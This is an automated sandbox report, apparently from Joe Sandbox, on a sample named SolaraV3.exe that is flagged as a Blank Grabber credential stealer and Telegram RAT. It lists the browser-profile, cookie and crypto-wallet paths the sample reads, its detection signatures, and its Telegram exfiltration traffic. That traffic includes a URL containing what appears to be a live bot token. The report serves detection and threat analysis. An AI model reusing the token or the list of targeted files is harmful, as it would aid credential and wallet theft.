Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\EntryDB	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_agimnkijcaahngcdmfeangaknmldooml	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage\6f70cc77-7837-4f44-9c31-7de59e446d67	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Download Service\Files	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Session Storage	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\PersistentOriginTrials	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Scripts	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\WebStorage	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SignalStorageConfigDB	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_aghbiahbpaijignceidepookljebhfak	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\commerce_subscription_db	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\blob_storage	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\favicons.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\BudgetDatabase	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Feature Engagement Tracker	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data\LevelDB	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_mpnpojknpmmopombnjdcgaaiekajbnjb	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\databases	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\content-prefs.sqlite	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sessions	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\shared_proto_db\metadata	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension State	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Network	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_model_metadata_store	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GPUCache	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\GCM Store	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Session Storage	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\optimization_guide_hint_cache_store	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\DawnCache	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\coupon_db	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\AutofillStrikeDatabase	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Data	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\Manifest Resources	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extension Rules	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\nmmhkkegccagdldgiimedpiccmgmieda\def\Cache\Cache_Data	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Segmentation Platform\SegmentInfoDB	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Storage\ext	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_fhihpiojkbmbpdjeoajapmgkhlnakfjf	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cache	Jump to behavior

Tries to steal Crypto Currency Wallets

Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file_0.indexeddb.leveldb	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\Electrum\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets	Jump to behavior

Steals Internet Explorer cookies

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

File read: C:\Users\user\AppData\Local\Temp\ ?? ? \Credentials\Chrome\Chrome Cookies.txt

Yara detected Credential Stealer

Source: Yara match	File source: 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SolaraV3.exe PID: 4892, type: MEMORYSTR

Remote Access Functionality

Yara detected Blank Grabber

Source: Yara match	File source: 00000002.00000003.1578431253.000001FC253C8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1563577276.000001EA23124000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2038580325.000001FC25070000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.2037278592.000001FC22CD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.1577254903.000001FC253A0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.1563577276.000001EA23122000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000003.2034413215.000001FC25CB1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SolaraV3.exe PID: 2884, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SolaraV3.exe PID: 4892, type: MEMORYSTR
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\_MEI28842\rarreg.key, type: DROPPED

Yara detected Telegram RAT

Source: Yara match

File source: Process Memory Space: SolaraV3.exe PID: 4892, type: MEMORYSTR

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Source: C:\Users\user\Desktop\SolaraV3.exe

Code function: 2_2_00007FFB0B812B62 bind,WSAGetLastError,

2_2_00007FFB0B812B62

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Contacted Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	true
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	true

Private

IP
127.0.0.1

Contacted Domains

Name	IP	Active
ip-api.com	208.95.112.1	true
api.telegram.org	149.154.167.220	true
blank-a0m8c.in	unknown	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot7576687091:AAHc9LHp1oJNmPES1PMfu8JQQ9jVtHibTlc/sendDocument	true

AV Detection

Multi AV Scanner detection for submitted file

Source: SolaraV3.exe

ReversingLabs: Detection: 55%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe

Code function: 110_2_00007FF74EE8901C CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,

110_2_00007FF74EE8901C

Source: SolaraV3.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE

Source:	Binary string: D:\a\1\b\bin\amd64\select.pdb source: SolaraV3.exe, 00000002.00000002.2054170176.00007FFB1E4C1000.00000040.00000001.01000000.0000000D.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: SolaraV3.exe, 00000002.00000002.2046985205.00007FFB0B7FC000.00000040.00000001.01000000.00000013.sdmp
Source:	Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASMOpenSSL 1.1.1t 7 Feb 2023built on: Thu Feb 9 15:27:40 2023 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-1_1"not available source: SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: d:\a01\_work\12\s\\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdb source: SolaraV3.exe, 00000001.00000003.1559590237.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000002.00000002.2053703446.00007FFB1C3C1000.00000002.00000001.01000000.00000005.sdmp, VCRUNTIME140.dll.1.dr
Source:	Binary string: D:\a\1\b\bin\amd64\_ctypes.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2051655996.00007FFB0C5F1000.00000040.00000001.01000000.00000006.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_hashlib.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2051929047.00007FFB18B71000.00000040.00000001.01000000.00000011.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: SolaraV3.exe
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdbMM source: SolaraV3.exe, 00000002.00000002.2051343700.00007FFB0C5DB000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\libssl-1_1.pdb@@ source: SolaraV3.exe, 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\python310.pdb source: SolaraV3.exe, 00000002.00000002.2049056875.00007FFB0BECF000.00000040.00000001.01000000.00000004.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_queue.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2053917460.00007FFB1E471000.00000040.00000001.01000000.00000012.sdmp
Source:	Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_ASM -DRC4_ASM -DMD5_ASM -DAESNI_ASM -DVPAES_ASM -DGHASH_ASM -DECP_NISTZ256_ASM -DX25519_ASM -DPOLY1305_ASM source: SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BA60000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.pdb source: powershell.exe, 0000004A.00000002.1847941368.00000239E7D72000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: ;C:\Users\user\AppData\Local\Temp\se3yji4z\se3yji4z.pdbhP@ source: powershell.exe, 0000004A.00000002.1847941368.00000239E7D72000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_lzma.pdb source: SolaraV3.exe, 00000002.00000002.2051343700.00007FFB0C5DB000.00000040.00000001.01000000.00000008.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_bz2.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2053371221.00007FFB1C251000.00000040.00000001.01000000.00000009.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\sqlite3.pdb source: SolaraV3.exe, 00000002.00000002.2050924426.00007FFB0C441000.00000040.00000001.01000000.0000000B.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_socket.pdb source: SolaraV3.exe, 00000002.00000002.2052555001.00007FFB1AB01000.00000040.00000001.01000000.0000000C.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_sqlite3.pdb source: SolaraV3.exe, 00000002.00000002.2052925726.00007FFB1BB11000.00000040.00000001.01000000.0000000A.sdmp
Source:	Binary string: D:\a\1\b\libcrypto-1_1.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2047840849.00007FFB0BAE2000.00000040.00000001.01000000.0000000F.sdmp
Source:	Binary string: D:\Projects\WinRAR\rar\build\rar64\Release\RAR.pdb source: rar.exe, 0000006E.00000000.1923151482.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmp, rar.exe, 0000006E.00000002.1937569828.00007FF74EEE0000.00000002.00000001.01000000.00000022.sdmp, rar.exe.1.dr
Source:	Binary string: D:\a\1\b\libssl-1_1.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2050155704.00007FFB0C3C6000.00000040.00000001.01000000.00000010.sdmp
Source:	Binary string: D:\a\1\b\bin\amd64\_ssl.pdb source: SolaraV3.exe, SolaraV3.exe, 00000002.00000002.2050619713.00007FFB0C411000.00000040.00000001.01000000.0000000E.sdmp

Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC709280 FindFirstFileExW,FindClose,	1_2_00007FF6DC709280
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC7083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	1_2_00007FF6DC7083C0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 1_2_00007FF6DC721874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	1_2_00007FF6DC721874
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC709280 FindFirstFileExW,FindClose,	2_2_00007FF6DC709280
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC721874 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,	2_2_00007FF6DC721874
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FF6DC7083C0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,	2_2_00007FF6DC7083C0
Source: C:\Users\user\Desktop\SolaraV3.exe	Code function: 2_2_00007FFB0B81322E MultiByteToWideChar,GetLastError,MultiByteToWideChar,MultiByteToWideChar,00007FFB2AD9F020,FindFirstFileW,FindNextFileW,WideCharToMultiByte,	2_2_00007FFB0B81322E
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE946EC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	110_2_00007FF74EE946EC
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EED88E0 FindFirstFileExA,	110_2_00007FF74EED88E0
Source: C:\Users\user\AppData\Local\Temp\_MEI28842\rar.exe	Code function: 110_2_00007FF74EE8E21C FindFirstFileW,FindClose,CreateFileW,DeviceIoControl,CloseHandle,	110_2_00007FF74EE8E21C

Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css	Jump to behavior
Source: C:\Users\user\Desktop\SolaraV3.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales	Jump to behavior

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2857751 - Severity 1 - ETPRO MALWARE SynthIndi Loader Exfiltration Activity (POST) : 192.168.2.7:49733 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 2857752 - Severity 1 - ETPRO MALWARE SynthIndi Loader CnC Response : 149.154.167.220:443 -> 192.168.2.7:49733

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: TUT-ASUS TUT-ASUS

May check the online IP address of the machine

Source: unknown	DNS query: name: ip-api.com
Source: unknown	DNS query: name: ip-api.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3
Source: global traffic	HTTP traffic detected: GET /json/?fields=225545 HTTP/1.1Host: ip-api.comAccept-Encoding: identityUser-Agent: python-urllib3/2.2.3

Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: SolaraV3.exe, 00000002.00000002.2043957200.000001FC25BCC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: `https://www.youtube.com/ equals www.youtube.com (Youtube)

Source: global traffic	DNS traffic detected: DNS query: blank-a0m8c.in
Source: global traffic	DNS traffic detected: DNS query: ip-api.com
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org

Source: unknown

Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.co
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560266326.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560491890.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559946901.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562526846.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560625770.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559830158.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1561239565.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, sqlite3.dll.1.dr, libssl-1_1.dll.1.dr, unicodedata.pyd.1.dr, _ssl.pyd.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: SolaraV3.exe, 00000001.00000003.1562285520.000001EA2312C000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1562285520.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, libffi-7.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: SolaraV3.exe, 00000001.00000003.1562816571.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560072884.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1559743250.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560147276.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563848325.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1560368534.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1564291533.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 00000001.00000003.1563980911.000001EA2311F000.00000004.00000020.00020000.00000000.sdmp, SolaraV3.exe, 